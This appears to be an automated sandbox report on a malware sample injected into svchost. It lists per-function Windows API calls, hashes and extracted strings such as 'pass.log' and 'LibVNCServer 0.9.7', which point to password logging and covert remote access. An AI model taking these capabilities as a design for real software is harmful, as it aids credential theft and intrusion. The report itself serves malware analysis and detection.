                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2643679612-0
                                                                                                                                                                                                            • Opcode ID: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
                                                                                                                                                                                                            • Instruction ID: 959e801d460fe618b7d861801d82dddbef8d6917c6acba2e40b479354d5c2cc3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65F03732680344BBD7115BA5EC8DF9BBF6CEB89761F004955FA05C7241C575DC118A70
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7D2FA
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7D302
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D314
                                                                                                                                                                                                            • GetFocus.USER32 ref: 02C7D316
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D323
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 968181190-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strncpy.MSVCRT ref: 02C87461
                                                                                                                                                                                                              • Part of subcall function 02C86DE0: fseek.MSVCRT ref: 02C86E04
                                                                                                                                                                                                              • Part of subcall function 02C86DE0: fwrite.MSVCRT ref: 02C86E17
                                                                                                                                                                                                            • fseek.MSVCRT ref: 02C873EA
                                                                                                                                                                                                            • fread.MSVCRT ref: 02C87408
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: fseek$freadfwritestrncpy
                                                                                                                                                                                                            • String ID: 6d1da759
                                                                                                                                                                                                            • API String ID: 3817246059-2775040301
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 02C7FEF3
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FF02
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeadersHttpRequest
                                                                                                                                                                                                            • String ID: ($Accept-Encoding:
                                                                                                                                                                                                            • API String ID: 1754618566-3981465706
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E1D7
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02C8E240
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                            • String ID: 6d1da208$pass.log
                                                                                                                                                                                                            • API String ID: 1760361154-2140601709
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: mallocrealloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 948496778-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: mallocrealloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 948496778-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2781271927-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wsprintf
                                                                                                                                                                                                            • String ID: %s (%s)$LibVNCServer 0.9.7$unknown
                                                                                                                                                                                                            • API String ID: 2111968516-696653274
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C81152
                                                                                                                                                                                                            • GetParent.USER32(?), ref: 02C8115E
                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ParentTextWindowmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4175915554-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,?), ref: 02C87A23
                                                                                                                                                                                                              • Part of subcall function 02C82CE0: GetProcessHeap.KERNEL32(00000008,02C7FB17,02C7FB03,?,02C87515,?,?,?), ref: 02C82CF1
                                                                                                                                                                                                              • Part of subcall function 02C82CE0: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02C82CF8
                                                                                                                                                                                                              • Part of subcall function 02C82CE0: memset.MSVCRT ref: 02C82D08
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,?,?,02C7E885,?), ref: 02C87A3E
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: memset.MSVCRT ref: 02C8CBE1
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8CC4D
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8CC83
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: PathFileExistsA.SHLWAPI(00000000,6D1DA3E6), ref: 02C8CCC9
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B23
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B36
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B49
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: GetLastError.KERNEL32 ref: 02C92BCC
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: IsUserAnAdmin.SHELL32 ref: 02C92BD4
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: SetLastError.KERNEL32(00000000), ref: 02C92BEC
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$strstr$DirectoryErrorHeapLastmemset$AdminAllocateCreateCurrentExistsFileFolderMakeProcessReadSystemUsermemcpy
                                                                                                                                                                                                            • String ID: GET $POST
                                                                                                                                                                                                            • API String ID: 166286580-2494278042
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020,7556F380,-00000010,?,02C7429D,?), ref: 02C7400C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C7429D,?), ref: 02C74013
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C74052
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                            • String ID: %d.%d.%d.%d
                                                                                                                                                                                                            • API String ID: 1060465051-3491811756
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,75497390,?,?,02C85BC4), ref: 02C891DA
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C891F4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,?,02C85BC4), ref: 02C8920C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C85BC4), ref: 02C8921D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandle$CloseInformationMutexThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3835061634-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,02C876BE,00000000,02C7FB03,6d1da3b2,?,?,?,?,?,?), ref: 02C8A2B0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8A150,00000000,00000000,00000000), ref: 02C8A2C5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2E3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2F4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1825730051-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,02C8790E,00000000,02C7FB03,6d1da208,?,?,?,?,?,?), ref: 02C8E840
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8E6E0,00000000,00000000,00000000), ref: 02C8E855
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E873
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E884
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1825730051-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,02C8785E,00000000,02C7FB03,6d1da28e,?,?,?,?,?,?), ref: 02C8D940
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8D7E0,00000000,00000000,00000000), ref: 02C8D955
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D973
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D984
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1825730051-0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: private$public
                                                                                                                                                                                                            • API String ID: 0-4176808989
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountTick_snprintf
                                                                                                                                                                                                            • String ID: %dd %dh %dm
                                                                                                                                                                                                            • API String ID: 3495410349-3074259717
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A834
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7A850
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2017088797-465009422
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,00000008,00000000,?), ref: 02CA6F28
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000008,00000000,?), ref: 02CA6FCB
                                                                                                                                                                                                            • memset.MSVCRT ref: 02CA7044
                                                                                                                                                                                                            • memset.MSVCRT ref: 02CA707D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1297977491-0
                                                                                                                                                                                                            • Opcode ID: 5a99cf2c19caa97d2b88e01849c5dc47cdf9900b7fa518adc4f37197e6ee117c
                                                                                                                                                                                                            • Instruction ID: fcec472d8811079ba1f776a678c5332af73bd4d2dcd02613962e01a052ad3254
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a99cf2c19caa97d2b88e01849c5dc47cdf9900b7fa518adc4f37197e6ee117c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F516576A00B028FC714CF69C9D566AF7F6FF84308B28492DD98687A10E772F954CB80
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02C7DA3F
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02C7DA46
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7DA56
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 02C7DA61
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 471586229-0
                                                                                                                                                                                                            • Opcode ID: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
                                                                                                                                                                                                            • Instruction ID: 5eb95878f65c72346972bc3317d04c08cfa5de28d9cf7efa16dcff17412b4f01
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901F233A852156B86219A69AC44FE7B79CFFC5770F008251FD06DF184D721EA0483E0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02C7E94B,?,?,?), ref: 02C7E2A8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C7E94B,?,?,?), ref: 02C7E2AF
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7E2BF
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,02C7E94B,?,?,?), ref: 02C7E2CA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 471586229-0
                                                                                                                                                                                                            • Opcode ID: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
                                                                                                                                                                                                            • Instruction ID: b62f0556ec8815c3ad3f713ae6f7287db69877e0de0a2f1143eff459f65c52f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5F05533A0166137C6226A99AC44FCBB75CEFD2760F400260FE00EF280CA20DE0087F1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,?,7556F380,?,02C7D799,00000000,?,00000000,02C7EAE2), ref: 02C7D3A4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D3A7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D3B4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D3B7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
                                                                                                                                                                                                            • Instruction ID: b848486a1f158c6433e21d6dcf7b06956120b6300da42dc684efe6e88b722ed3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F06D74E40362ABEB105F39AC48B977BECAF48686F940481E90ED3140E775C910AAA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C05
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02CB1C08
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C15
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02CB1C18
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
                                                                                                                                                                                                            • Instruction ID: 9aba192d21fd338b10a677a2566ba91084e4345642c3fd3c61d2f9676863cdc5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BE08632FC526877C51226A66C0CF877B1CDFC1B72F094411F608D3141C660941096F0